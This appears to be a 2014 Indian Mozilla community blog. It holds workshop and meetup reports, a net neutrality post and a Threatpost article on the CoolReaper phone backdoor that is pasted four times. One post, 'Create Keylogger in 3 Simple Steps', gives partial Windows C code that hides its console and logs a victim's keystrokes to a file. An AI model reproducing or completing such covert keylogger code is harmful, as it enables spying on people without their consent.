Monday 29 December 2014

Net Neutrality - The endangered Idea

Airtel Charging Additionally for VOIP Calls.

      This New Year as a Shocking surprise to subscribers, Airtel has changed its Terms of Service to not cover VoIP (voice over internet protocol) ie Skype, Viber etc traffic under its data plans.Although
Airtel has decided to not implement new pricing right now. They will wait for TRAI to form regulation for the same.




Certain things that Still matter....
  •  Airtel hasn’t withdrawn the VoIP packs because of consumer outrage. It’s withdrawn the pack because of the impending TRAI consultation.
  •  As Airtel points out, the consultation will not just cover VoIP, but also other OTT services. As per a COAI paper, these services include Instant Messaging (IM), Applications (Apps), Cloud Services, Internet Television, IPTV, M2M – Machine to Machine (M2M) communications, Social Networking, apart from VoIP.
  •  The TRAI, as we explained, appears predisposed towards a regulation of online services, and we’re not sure if we can expect a neutral consultation from the TRAI.
 How are we effected by this ?
  • Now you would not be able to call your friends for free using internet.
  • Now mere data pack is now sufficiant now you would need to pay as per the way you use it.
  • No matter what is the amount of data balance you have in your account you have to pay more to use the VOIP services like Viber, Skype etc.  
  • Now you should start looking for the call rates specified by the service provider even for the online calls. 

What is Net Neutrality?

    The 3 principles of net neutrality are [Source: Medianama]:

  1. All sites must be equally accessible: ISPs and telecom operators shouldn’t block certain sites or apps just because they don’t pay them.
  2. All sites must be accessible at the same speed (at an ISP level): This means no speeding up of certain sites because of business deals. More importantly, it means no slowing down some sites.
  3. The cost of access must be the same for all sites (per Kb/Mb or as per data plan): This means no “Zero Rating”. In countries like India, Net Neutrality is more about cost of access than speed of access, because, well, we don’t have fast and slow lanes: all lanes are slow.
Think Before Its Too Late !!!!

Friday 26 December 2014

Know the Foxy @ I-Cafe

Growth is always a combined effort !!!

Believing in the above saying this time I thought of interacting with the entrepreneurs in the city and invite them for the occasion of the MCR Anniversary event that is supposed to be organized on the 24th & 25th of the next month .
This is the first time MCR is interacting with the various software firm representatives in the city so that our volunteers can be benefited by the industrial experience to groom their skills in better way and today I had a meeting with Mr. Jitendra Jain the Managing Director of I-cafe Technology Pvt. Ltd and his entire team.



At this moment we had a word and I found them keenly interested in the Firefox OS thus decided to organize the small acknowledgement session for everyone on-board. Soon we started with a session of the architecture and how to contribute to its codebase and marketplace. All the developers shared great ideas and development plans.Then with a active contributor unleashed in everyone of us the event reached completion.


Had a amazing day hope to see more contributors from this firm.

Saturday 20 December 2014

Planning On !!!

As we all know great things have planning behind it!
 So today Ram, Trishul, Meghraj, Adit, Dipesh, Lavish and I gathered online to plan for the upcoming event " MCR ANNIVERSARY " one of the biggest event in history of Mozilla Community Rajasthan. The motto of this meeting was to discuss the distribution of the responsibilities and to create the to-do list. 

In this first of all Ram told us about the general things that need to kept in mind for the online meetings he  told us about the general format of online meetings. He also suggested the general format for the mega events. He was also a great helping hand for us in deciding the sessions that would be the part of that event.

Trishul acknowledged everyone about the various sessions that can be held regarding Firefox OS for the application development and codebase contribution for attendees.Ram gave add-on  information to us by his experience from the previous events.

Then everyone was given responsibilities about the various sessions to the voulenteers in which they were suppose to submit the matrices about the milestones achieved and the upcoming goals for their communities.

A specific form was created and shared for the attendees where they could specify the contributions done by them and why should they be invited to the event. These responses would be evaluated by the various group leads in MCR and then they selected contributors would be invited for the ceremony where they can individually interact with the knowledgeable people.
Finally meeting was summarized with a slightly clear idea of the entire event and responsibilities.

More Details to Be discussed soon !!!!

Stay Tuned !! :)

Wednesday 17 December 2014

OEM Backdoor Detected !!



     A popular Android smartphone sold primarily in China and Taiwan but also available worldwide, contains a backdoor from the manufacturer that is being used to push pop-up advertisements and install apps without users’ consent.

The Coolpad devices, however, are ripe for much more malicious abuse, researchers at Palo Alto Networks said today, especially after the discovery of a vulnerability in the backend management interface that exposed the backdoor’s control system.



Ryan Olson, intelligence director at Palo Alto, said the CoolReaper backdoor not only connects to a number of command and control servers, but is also capable of downloading, installing and activating any Android application without the user’s permission. It also sends phony over-the-air updates to devices that instead install applications without notifying the user. The backdoor can also be used to dial phone numbers, send SMS and MMS messages, and upload device and usage information to Coolpad.

The manufacturer has also taken steps via modifications to its version of Android to keep the backdoor hidden from users and security software that could be installed on the phone. For example, Olson said Coolpad has disabled the long-press system that allows a user to find out what application generated an pop-up advertisement or notification, for example.

“Because this is built so deep into the operating system, it can do lots of things, not just display pop-ups,” Olson said. “They can install anything they want without user consent, and push data onto the phone.”

For now it appears the manufacturer’s motivation is revenue generation, given that most users who complained about suspicious behavior in Coolpad user forums expressed concerns about pop-ups and unwanted ads.

“One thing is true of all backdoors,” Olson said. “When you create a backdoor, you might have good intentions, but any backdoor could be abused by an outsider against an individual user or against all users to install their own application.”

Coolpad is the third largest smartphone builder in China, and ranks sixth worldwide with 3.7 percent global market share. It trails only Lenovo and Xiaomi in China and is the leader of China’s 4G market with 16 percent market share. Coolpad outsells Samsung and Apple in China, and has said it plans to expand globally with a goal of 60 million phones worldwide. For now, its high-end Halo Dazen phones are the only ones containing the backdoor, Palo Alto said.

Palo Alto researchers there looked at 77 ROMs for Coolpad Android devices, 64 of which contained the CoolReaper backdoor; 41 of the infected devices contained stock ROM files for eight Dazen models, while 23 were found in third-party ROMs for the remaining 16 Coolpad models, Palo Alto said. The 41 stock ROM files were signed with a certificate belonging to Coolpad, and the command and control domains, coolyun[.]com and 51Coolpad[.]com, are registered by Coolpad and used by the company’s cloud services.

With plans to expand distribution into the United States, Europe and Southeast Asia, the disclosure of CoolReaper, there is the potential for widespread abuse.

“We’ve never seen something with this much capability [from a manufacturer],” Olson said, pointing out that CoolReaper even exceeds Carrier IQ’s software that was found to be recording keystrokes in addition to gathering device and usage information. “This is way more than logging keystrokes. It is installing apps without consent and aggressively hiding from the OS and antivirus programs on the phone.”

Olson said users are reporting that the unwanted apps are games, hinting again that Coolpad may be seeking a separate revenue stream to supplement its sales of relatively inexpensive Android devices.

While sneakily pushing apps and updates onto the phone is bad enough, the independent discovery of the backdoor interface online and subsequent disclosure of a vulnerability means that anyone could access backdoored Coolpad devices and do serious damage.

The vulnerability in the backend control system was reported on Nov. 19 to WooYun.org, a vulnerability crowdsourcing website similar to Bugcrowd. The white-hat researcher was able to log into a Permission Management Platform where, and if he chose, would have been able to push apps through a phone OTA update, silently install and activate APK files, and more. Coolpad confirmed the vulnerability on the same day and gave it its highest severity ranking along with a promise to patch. Olson said Palo Alto has not been able to confirm whether the patch has been made available.

“The vulnerability allows unauthorized access; users are not properly authenticated and it’s on the open Internet,” Olson said. “You’d be able to install whatever you wanted on the phones through a backdoor that’s not necessarily secure.”

A technology publication in China quoting Coolpad public relations said the backdoor is used only for internal testing. However in the next upgrade from version 2.x to 3.0, the backdoor’s APK name was merely changed from CP_DMP.apk to GoogleGmsFramework.apk to hide it from users who had already found it, Palo Alto speculated.

“The fact that the CoolReaper management interface could be hijacked by malicious attackers through a vulnerability helps highlight the danger of pre-installing this type of backdoor program,” Palo Alto said in its report. “While this vulnerability may be already fixed, others may exist that could allow a malicious actor to take control Coolpad devices.”

Information From : www.threatpost.com
- See more at: http://threatpost.com/manufacturers-backdoor-found-on-popular-chinese-android-smartphone/109929#sthash.yAULg7zC.dpuf
- See more at: http://threatpost.com/manufacturers-backdoor-found-on-popular-chinese-android-smartphone/109929#sthash.yAULg7zC.dpuf
- See more at: http://threatpost.com/manufacturers-backdoor-found-on-popular-chinese-android-smartphone/109929#sthash.yAULg7zC.dpuf
A popular Android smartphone sold primarily in China and Taiwan but also available worldwide, contains a backdoor from the manufacturer that is being used to push pop-up advertisements and install apps without users’ consent.
The Coolpad devices, however, are ripe for much more malicious abuse, researchers at Palo Alto Networks said today, especially after the discovery of a vulnerability in the backend management interface that exposed the backdoor’s control system.
Ryan Olson, intelligence director at Palo Alto, said the CoolReaper backdoor not only connects to a number of command and control servers, but is also capable of downloading, installing and activating any Android application without the user’s permission. It also sends phony over-the-air updates to devices that instead install applications without notifying the user. The backdoor can also be used to dial phone numbers, send SMS and MMS messages, and upload device and usage information to Coolpad.
The manufacturer has also taken steps via modifications to its version of Android to keep the backdoor hidden from users and security software that could be installed on the phone. For example, Olson said Coolpad has disabled the long-press system that allows a user to find out what application generated an pop-up advertisement or notification, for example.
“Because this is built so deep into the operating system, it can do lots of things, not just display pop-ups,” Olson said. “They can install anything they want without user consent, and push data onto the phone.”
For now it appears the manufacturer’s motivation is revenue generation, given that most users who complained about suspicious behavior in Coolpad user forums expressed concerns about pop-ups and unwanted ads.
“One thing is true of all backdoors,” Olson said. “When you create a backdoor, you might have good intentions, but any backdoor could be abused by an outsider against an individual user or against all users to install their own application.”
Coolpad is the third largest smartphone builder in China, and ranks sixth worldwide with 3.7 percent global market share. It trails only Lenovo and Xiaomi in China and is the leader of China’s 4G market with 16 percent market share. Coolpad outsells Samsung and Apple in China, and has said it plans to expand globally with a goal of 60 million phones worldwide. For now, its high-end Halo Dazen phones are the only ones containing the backdoor, Palo Alto said.
Palo Alto researchers there looked at 77 ROMs for Coolpad Android devices, 64 of which contained the CoolReaper backdoor; 41 of the infected devices contained stock ROM files for eight Dazen models, while 23 were found in third-party ROMs for the remaining 16 Coolpad models, Palo Alto said. The 41 stock ROM files were signed with a certificate belonging to Coolpad, and the command and control domains, coolyun[.]com and 51Coolpad[.]com, are registered by Coolpad and used by the company’s cloud services.
With plans to expand distribution into the United States, Europe and Southeast Asia, the disclosure of CoolReaper, there is the potential for widespread abuse.
“We’ve never seen something with this much capability [from a manufacturer],” Olson said, pointing out that CoolReaper even exceeds Carrier IQ’s software that was found to be recording keystrokes in addition to gathering device and usage information. “This is way more than logging keystrokes. It is installing apps without consent and aggressively hiding from the OS and antivirus programs on the phone.”
Olson said users are reporting that the unwanted apps are games, hinting again that Coolpad may be seeking a separate revenue stream to supplement its sales of relatively inexpensive Android devices.
While sneakily pushing apps and updates onto the phone is bad enough, the independent discovery of the backdoor interface online and subsequent disclosure of a vulnerability means that anyone could access backdoored Coolpad devices and do serious damage.
The vulnerability in the backend control system was reported on Nov. 19 to WooYun.org, a vulnerability crowdsourcing website similar to Bugcrowd. The white-hat researcher was able to log into a Permission Management Platform where, and if he chose, would have been able to push apps through a phone OTA update, silently install and activate APK files, and more. Coolpad confirmed the vulnerability on the same day and gave it its highest severity ranking along with a promise to patch. Olson said Palo Alto has not been able to confirm whether the patch has been made available.
“The vulnerability allows unauthorized access; users are not properly authenticated and it’s on the open Internet,” Olson said. “You’d be able to install whatever you wanted on the phones through a backdoor that’s not necessarily secure.”
A technology publication in China quoting Coolpad public relations said the backdoor is used only for internal testing. However in the next upgrade from version 2.x to 3.0, the backdoor’s APK name was merely changed from CP_DMP.apk to GoogleGmsFramework.apk to hide it from users who had already found it, Palo Alto speculated.
“The fact that the CoolReaper management interface could be hijacked by malicious attackers through a vulnerability helps highlight the danger of pre-installing this type of backdoor program,” Palo Alto said in its report. “While this vulnerability may be already fixed, others may exist that could allow a malicious actor to take control Coolpad devices.”
- See more at: http://threatpost.com/manufacturers-backdoor-found-on-popular-chinese-android-smartphone/109929#sthash.yAULg7zC.dpuf
A popular Android smartphone sold primarily in China and Taiwan but also available worldwide, contains a backdoor from the manufacturer that is being used to push pop-up advertisements and install apps without users’ consent.
The Coolpad devices, however, are ripe for much more malicious abuse, researchers at Palo Alto Networks said today, especially after the discovery of a vulnerability in the backend management interface that exposed the backdoor’s control system.
Ryan Olson, intelligence director at Palo Alto, said the CoolReaper backdoor not only connects to a number of command and control servers, but is also capable of downloading, installing and activating any Android application without the user’s permission. It also sends phony over-the-air updates to devices that instead install applications without notifying the user. The backdoor can also be used to dial phone numbers, send SMS and MMS messages, and upload device and usage information to Coolpad.
The manufacturer has also taken steps via modifications to its version of Android to keep the backdoor hidden from users and security software that could be installed on the phone. For example, Olson said Coolpad has disabled the long-press system that allows a user to find out what application generated an pop-up advertisement or notification, for example.
“Because this is built so deep into the operating system, it can do lots of things, not just display pop-ups,” Olson said. “They can install anything they want without user consent, and push data onto the phone.”
For now it appears the manufacturer’s motivation is revenue generation, given that most users who complained about suspicious behavior in Coolpad user forums expressed concerns about pop-ups and unwanted ads.
“One thing is true of all backdoors,” Olson said. “When you create a backdoor, you might have good intentions, but any backdoor could be abused by an outsider against an individual user or against all users to install their own application.”
Coolpad is the third largest smartphone builder in China, and ranks sixth worldwide with 3.7 percent global market share. It trails only Lenovo and Xiaomi in China and is the leader of China’s 4G market with 16 percent market share. Coolpad outsells Samsung and Apple in China, and has said it plans to expand globally with a goal of 60 million phones worldwide. For now, its high-end Halo Dazen phones are the only ones containing the backdoor, Palo Alto said.
Palo Alto researchers there looked at 77 ROMs for Coolpad Android devices, 64 of which contained the CoolReaper backdoor; 41 of the infected devices contained stock ROM files for eight Dazen models, while 23 were found in third-party ROMs for the remaining 16 Coolpad models, Palo Alto said. The 41 stock ROM files were signed with a certificate belonging to Coolpad, and the command and control domains, coolyun[.]com and 51Coolpad[.]com, are registered by Coolpad and used by the company’s cloud services.
With plans to expand distribution into the United States, Europe and Southeast Asia, the disclosure of CoolReaper, there is the potential for widespread abuse.
“We’ve never seen something with this much capability [from a manufacturer],” Olson said, pointing out that CoolReaper even exceeds Carrier IQ’s software that was found to be recording keystrokes in addition to gathering device and usage information. “This is way more than logging keystrokes. It is installing apps without consent and aggressively hiding from the OS and antivirus programs on the phone.”
Olson said users are reporting that the unwanted apps are games, hinting again that Coolpad may be seeking a separate revenue stream to supplement its sales of relatively inexpensive Android devices.
While sneakily pushing apps and updates onto the phone is bad enough, the independent discovery of the backdoor interface online and subsequent disclosure of a vulnerability means that anyone could access backdoored Coolpad devices and do serious damage.
The vulnerability in the backend control system was reported on Nov. 19 to WooYun.org, a vulnerability crowdsourcing website similar to Bugcrowd. The white-hat researcher was able to log into a Permission Management Platform where, and if he chose, would have been able to push apps through a phone OTA update, silently install and activate APK files, and more. Coolpad confirmed the vulnerability on the same day and gave it its highest severity ranking along with a promise to patch. Olson said Palo Alto has not been able to confirm whether the patch has been made available.
“The vulnerability allows unauthorized access; users are not properly authenticated and it’s on the open Internet,” Olson said. “You’d be able to install whatever you wanted on the phones through a backdoor that’s not necessarily secure.”
A technology publication in China quoting Coolpad public relations said the backdoor is used only for internal testing. However in the next upgrade from version 2.x to 3.0, the backdoor’s APK name was merely changed from CP_DMP.apk to GoogleGmsFramework.apk to hide it from users who had already found it, Palo Alto speculated.
“The fact that the CoolReaper management interface could be hijacked by malicious attackers through a vulnerability helps highlight the danger of pre-installing this type of backdoor program,” Palo Alto said in its report. “While this vulnerability may be already fixed, others may exist that could allow a malicious actor to take control Coolpad devices.”
- See more at: http://threatpost.com/manufacturers-backdoor-found-on-popular-chinese-android-smartphone/109929#sthash.yAULg7zC.dpuf
A popular Android smartphone sold primarily in China and Taiwan but also available worldwide, contains a backdoor from the manufacturer that is being used to push pop-up advertisements and install apps without users’ consent.
The Coolpad devices, however, are ripe for much more malicious abuse, researchers at Palo Alto Networks said today, especially after the discovery of a vulnerability in the backend management interface that exposed the backdoor’s control system.
Ryan Olson, intelligence director at Palo Alto, said the CoolReaper backdoor not only connects to a number of command and control servers, but is also capable of downloading, installing and activating any Android application without the user’s permission. It also sends phony over-the-air updates to devices that instead install applications without notifying the user. The backdoor can also be used to dial phone numbers, send SMS and MMS messages, and upload device and usage information to Coolpad.
The manufacturer has also taken steps via modifications to its version of Android to keep the backdoor hidden from users and security software that could be installed on the phone. For example, Olson said Coolpad has disabled the long-press system that allows a user to find out what application generated an pop-up advertisement or notification, for example.
“Because this is built so deep into the operating system, it can do lots of things, not just display pop-ups,” Olson said. “They can install anything they want without user consent, and push data onto the phone.”
For now it appears the manufacturer’s motivation is revenue generation, given that most users who complained about suspicious behavior in Coolpad user forums expressed concerns about pop-ups and unwanted ads.
“One thing is true of all backdoors,” Olson said. “When you create a backdoor, you might have good intentions, but any backdoor could be abused by an outsider against an individual user or against all users to install their own application.”
Coolpad is the third largest smartphone builder in China, and ranks sixth worldwide with 3.7 percent global market share. It trails only Lenovo and Xiaomi in China and is the leader of China’s 4G market with 16 percent market share. Coolpad outsells Samsung and Apple in China, and has said it plans to expand globally with a goal of 60 million phones worldwide. For now, its high-end Halo Dazen phones are the only ones containing the backdoor, Palo Alto said.
Palo Alto researchers there looked at 77 ROMs for Coolpad Android devices, 64 of which contained the CoolReaper backdoor; 41 of the infected devices contained stock ROM files for eight Dazen models, while 23 were found in third-party ROMs for the remaining 16 Coolpad models, Palo Alto said. The 41 stock ROM files were signed with a certificate belonging to Coolpad, and the command and control domains, coolyun[.]com and 51Coolpad[.]com, are registered by Coolpad and used by the company’s cloud services.
With plans to expand distribution into the United States, Europe and Southeast Asia, the disclosure of CoolReaper, there is the potential for widespread abuse.
“We’ve never seen something with this much capability [from a manufacturer],” Olson said, pointing out that CoolReaper even exceeds Carrier IQ’s software that was found to be recording keystrokes in addition to gathering device and usage information. “This is way more than logging keystrokes. It is installing apps without consent and aggressively hiding from the OS and antivirus programs on the phone.”
Olson said users are reporting that the unwanted apps are games, hinting again that Coolpad may be seeking a separate revenue stream to supplement its sales of relatively inexpensive Android devices.
While sneakily pushing apps and updates onto the phone is bad enough, the independent discovery of the backdoor interface online and subsequent disclosure of a vulnerability means that anyone could access backdoored Coolpad devices and do serious damage.
The vulnerability in the backend control system was reported on Nov. 19 to WooYun.org, a vulnerability crowdsourcing website similar to Bugcrowd. The white-hat researcher was able to log into a Permission Management Platform where, and if he chose, would have been able to push apps through a phone OTA update, silently install and activate APK files, and more. Coolpad confirmed the vulnerability on the same day and gave it its highest severity ranking along with a promise to patch. Olson said Palo Alto has not been able to confirm whether the patch has been made available.
“The vulnerability allows unauthorized access; users are not properly authenticated and it’s on the open Internet,” Olson said. “You’d be able to install whatever you wanted on the phones through a backdoor that’s not necessarily secure.”
A technology publication in China quoting Coolpad public relations said the backdoor is used only for internal testing. However in the next upgrade from version 2.x to 3.0, the backdoor’s APK name was merely changed from CP_DMP.apk to GoogleGmsFramework.apk to hide it from users who had already found it, Palo Alto speculated.
“The fact that the CoolReaper management interface could be hijacked by malicious attackers through a vulnerability helps highlight the danger of pre-installing this type of backdoor program,” Palo Alto said in its report. “While this vulnerability may be already fixed, others may exist that could allow a malicious actor to take control Coolpad devices.”
- See more at: http://threatpost.com/manufacturers-backdoor-found-on-popular-chinese-android-smartphone/109929#sthash.yAULg7zC.dpuf

Saturday 6 December 2014

Know The Foxy - I

The first workshop of ' Know The Foxy Campaign ' was held at Carrier Point University Kota. The day started with an expression of joy on everyone's face. We reached the venue and were warmly welcomed by the Parth Sir (HOD Comp-science Dept). Event started with our introduction by the college authorities and Sonu (Club Lead Firefox Club-CPU).



Mr.Ram Dayal initiated the workshop by a brief overview about the various topics that would be discussed throughout the workshop along with the introduction to Mozilla mission and the enlightened everyone with the Mozilla manifesto. He also showed videos about the 'Open Web Idea' and 'Mozilla Community' thus increasing the curiosity of students about open-source. 
 Followed by a session on introduction to open-source and its power was delivered by Osho Parth.  During which he acknowledged everyone about the various interesting features of open source he also discussed the various verticals of contribution for Mozilla Community  helping everyone to know their area-of interest. With this we started with the practical session for everyone.

Next session was the most interesting session for everyone in which Mr.Shahbaz acknowledged everyone about webmaker tools. Everyone was surprised to see him changing the content of web-page as if it was a plain text. Then came Thimble and Popcorn which gave wings to everyone's imagination. Then came App-maker that enabled students to make their own mobile applications.

Then Came the most awaited session about the Firefox OS architecture and App Development for it by Ram Dayal and Osho Parth. In this session audiences were acknowledged about the multiple layers of FxOS and the application development procedure for it.

Now it was time for some doubt solving sessions this was more a kind of one to one session in which all the speakers and volunteers interacted with the audiences for solving their doubts. There were many great suggestions and queries from the students, it was an immense pleasure to see the interest of students in the workshop.


Then came the moment of appraisals for the students who interacted the most and this prize distribution was just a token of thanks to the students for being such a great support.We requested the college representatives to come and give away prizes to the students.

With this we reached the end of workshop thus was the time for fun activity which was 'Ali baba & 40 thieves' .


Group Picture.

Doing good is a part of our code.

Sunday 30 November 2014

Create Keylogger in 3 Simple Steps

SIMPLE KEYLOGGER IN 3 STEPS 

What is Keylogger?
Traditional Keylogger can be defined as a program that captures the host machine's keystrokes and sends it to the attacker but improvising themselves now the keyloggers are capable of logging the screenshots to capture the onscreen actions too.

The keylogger can be divided into 3 sections for understanding which are as follows (The code quoted below is just a section of actual code).

Initialization Of Resources :
    This section contains code about the initialization of the required resources for the logging process. This includes initializing the constants to be used during the code and requesting the header files containing the function prototypes that are to be used.Some common files are..

   #include <windows.h>
   #include <stdio.h>
   #include <winuser.h>
   #include <windowsx.h>
   #include <time.h>


Window Control Section :  
     This section is responsible for keeping the console window invisible on the victims computer (until searched very deeply).

   HWND stealth; 
   AllocConsole();
   stealth=FindWindowA("ConsoleWindowClass",NULL);
   ShowWindow(stealth,0);


Logging section :
     This section contains the condition based code that is responsible for identifying the key strokes. This contains various sections responsible for creating separate responses as the keys are pressed.For example we can refer to the following code to capture small letters in target file.

     if(GetAsyncKeyState(character)==-32767)
    { 
        FILE *file;
        file=fopen(FileName,"a+");

        if((character>64)&&(character<91))
       {
               character+=32;
               fputc(character,file);
               fclose(file);
               break;
        }

    }

Above given sample of code is as per C language for coding into another language the same logic can be implemented using its syntax .

Friday 28 November 2014

Know The Foxy - CPU Kota

On behalf of Mozilla Community Rajasthan it gives me immense pleasure to announce  that after rocking sessions at Chandigarh university , Chandigarh Punjab we are back again with a blast .Bringing you " Know The Foxy Campaign " (A series of workshops and sessions around the state Targeting at  Firefox OS  introduction and contribution ). Marching ahead to Kota for the first event of the campaign  at Carrier Point University , Kota .

The details of the event are as follows :-


Venue :- Career Point University  , Kota
Date :- 3rd December 2014
Time :- 10:00 Am to 03:00 Pm
Regional Coordinator :- Sonu Baidya
Mentors : Ram Dayal Gurumukhi and Osho Parth
To reserve your place : - Register Here
Speakers 
  • Ram Dayal
  • Osho Parth
  • Talha Anwar
  • Shahbaz Alam
Proposed Agenda For Event :-

10:00--10:40   Introduction  to Mozilla,  its Mission and Firefox OS launch in     India. 
10:45-11:45    Webmaker hands-on session. 
11:45-12:00    Break
12:00-02:00    FXOS App dev hands-on session . 
02:00-03:00    FSA registration and and explanation of contribution  verticals.prize distribution for makes and Apps 


Sunday 19 October 2014

App Dev Jaipur :)



So what can be worth of a Sunday -
  • a movie
  • an outing with friends
  • sleeping (my personal favorite :) )
But the love towards technology, development and self build-up drags each and every one of us to a common platform APP-Dev (our new Sundae-feast , new passion for Mozillians).

By each upcoming day the phenomenal effort is given as input by each which ultimately results in form of awesome apps. The idea is not to flood with random pieces but to produce marvel: in terms of UI, in terms of code.
Now our focus is not only on UI elements but also on quality of code. We believe Code to impress . Rather than writing complex-large-code we are trying to minimize and optimize the code.

trishul

Every new meetup updates our knowledge stack with
  • new ideas – from each and every one
  • new technologies – pros and cons of technologies and which should be used and when.
  • new  motivation – each meetup fills positivity and incline all of us towards app dev
  • new APP – for sure !!!

And last but not the least these meetups pumps up the community bonding and leads towards a stable growth of everyone.

Saturday 27 September 2014

Mozinar Udaipur

  


To spread the Mozilla mission our team now reached city of Lakes, Udaipur. Techno India NJR (Udaipur) was kind enough to provide us with all resources for our workshop.

This was a much awaited event as the planning for this event had started before a month. Dipesh Monga and his team (quite a dedicated one) had put a lot of efforts to make this a successful one.
The workshop started with the formal introductions, followed by explanation of Mozilla mission (Osho Parth). He explained the essence of open source and how Mozilla is into it and the various verticals of contribution to the open source .

15204470399_f81fafaf40_z

Then Meghraj Suthar explained about the webmaker tools and how to use them.

     15390901132_1c27d6c52c_z


 After that Trishul explained the ease of developing apps for Firefox OS.
Now since the Mini-camp Jaipur  we have made the hands on Sessions a mandatory part of every workshop. So we then started with hands-on session for web-maker followed by app dev hands-on.
The concept of hands-on was entirely new to the attendees and they enjoyed every bit of it. They have been attending various seminars and this was was the first time they were able to apply immediately what they have learned few minutes before. And surprisingly we got a number of remixes and eventually more volunteers :) .
15388039871_a8404e59d4_zAfter the hands-on the various contribution verticals were explained to the attendees in which they can start their contributions.
Dipesh Monga then demonstrated how to use the App-maker and what can be done with it. Again the audience were awestruck with the simplicity and ease of development. And last but not the least this event would not be possible without the enthusiastic volunteers.
15388032991_ec543d4902_z15204502030_cbbb32bc42_z
Finally we concluded the workshop by distributing few prizes for best makes and also collecting Ideas to fill our idea tanks.
15204653907_43d3d556a4_z15204407669_64f65074e0_k
So overall I think as a team we succeeded to deliver the Mozilla mission and hence can expect a lot of contributions from Udaipur.
Thanks to Techno NJR, Udaipur and wonderful and beautiful volunteers.
15388082191_1e8af5695e_k

Saturday 6 September 2014

MozGarh - Mozilla At Nargarh :)

hello everyone,
                        Well this was one of the most unexpected #makerparty(event link) of all time, i know iam too late to post about this event but better late then never.
In this blogpost i will be sharing my amazing trip to the NaharGarh Fort,Jaipur(wiki link ) which took place on 20th July,2014. The meetup actually started at saras parlour where we discussed about the upcoming agenda of MCR and about the Club reporting system, but as the time passed by we all decided to take a trip to the beautiful fort and continue our maker-party at NaharGarh. The event was attended by Osho Parth , Trishul Goel , Tushar Arora, Adit Bharadwaj and Santosh Mangal. 


The road trip pictures to Nahargarh. 

As we all reached the fort we explored the beauty of the fort, the ancient walls explained the glory of India.  We all chose a silent spot where the strong winds made our day. We discussed some of the webmaker tools and how we can use them in our future workshops to increases productivity and get even better results.


Discussing the Tools

At the end we just took a selfie and ended the awesome trip with a note that "no matter where you go or where u stay you can always explore the options and achieve your goals."

Some More pictures from the trip :) :



The selfie time :) 
“DOING GOOD IS A PART OF OUR CODE”

Monday 18 August 2014

MInicamp jaipur :)

Now this was the biggest and one of its kind event organized by MCR, and obviously the expectations were quite high. And after the event concluded we know the bar has been raised.
trishul1 trishul2

The event kick started with the memento signing by all the attendees. With a single sign everybody engraved their love for Mozilla on a single chart paper. Now the challenge was to bring people from different colleges, regions on a common platform and for this idea given by Vineel worked like a charm. All we needed to do was to call random two people from group and ask them to meet as a long lost friend : simple and Effective. This helped us to create a friendly and open environment.
vineel
Then Vineel (Mozilla India Community Liaison ) briefed everyone about what is Mozilla and Mozilla Mission. Vineel also explained what exactly is Firefox OS and what are the future plans to compete in the market.
This time we(Osho, Trishul) kept our self confined to organizers roles and gave the session responsibilities to Adit, Tushar and Lavish. Very first time we tried concept of parallel sessions. We arranged two parallel sessions of webmaker tools (a bit for non-coders) and also App-dev(a bit for web-coders). To help the attendees to choose the right session as per their interest, we the session leads briefed a bit about their session before hand.
trio
Now when the sessions started Lavish, AditTushar completely rocked. As single soldier can not win the war alone. These fellows were well assisted by Chandan Baba, Anju Chandel, Gautam Sharma, Raj Rohit, Dipesh Monga, Talha Anwar. And as a team, we were able infuse the charm and able to deliver the knowledge.
atte atten







And hats off to the attendees, we have organized a number of workshops in various parts of Rajasthan in span of an year, but I can proudly say we had the best set of attendees in this Minicamp, enthusiastic, quick-learner and most important willing to take an extra leap to cross the bar.
idea
trishul_ali_baba
After these session, was the turn of Ice Breaker Session “Ali Baba 40 thieves” and this was the point where we came to know what our community exactly is. Every body busted the floor with awesome dance moves, Chandan Baba being the Best :P .
suthar
After that Raj Suthar explained various contribution verticals in which one can contribute to Mozilla. The idea was delivered that anyone can contribute to Mozilla by as simple as even Tweeting.trishul
Trishul then explained a bit about mozilla code base, Bugzilla and a bit Geeky part.  We started each session with collecting ideas and pasting it over idea tanks.


The idea for this event was to keep hands-on approach for every thing and in complete event we stuck to this approach. Attendees made various makes live at the event, also we submitted a firefox app right in the event.
p1
Now finished from the organizers side, we called up the attendees and one by one they spoke about what they felt about the event and what they were able to achieve.
volun
Moving towards the conclusion the final part was a surprise PRIZES, we awarded prizes to the best performer from each event. And last but not the least a big thanks to some really creative people who engraved their creativity on charts and we were totally awe-struck.
charts
And Finally the MCR touch -> a round of FOXY pics and number of awesome memories to cherish.
c pp pp1

Friday 15 August 2014

JNU WebDay

This was a event hosted by one of our most enthusiastic  contributors Shahbaz Alam and was the first event hosted by him thus had a special value for each one of us.
Event was hosted at Saras parlor and had many contributors from Jaipur National University .

Event was initiated by none other than the host himself Mr.Shahbaz Alam who explained everyone about the What Mozilla is all about and requested everyone to introduce them self in few words along with the  description of the open-source idea in their vision.


I explained about what open source is and what mozilla is? and told us about the ways of contribution to mozilla.


A brief description of Webmaker was given and App-dev session started.
Participants were very much excited to learn about app development.
manifest files were given to students and hands on started.




Followed by a hands on session in which we created multiple webmaker makes and multiple application ideas were suggested by the fellow contributors and then came our first app for the day.  which was titled as Make me smile developed by hitesh 
    


Finally event summed up with the group picture.
At the end of session we had some awesome contributors who have the will and wisdom to carry ahead the spirit of the open-source .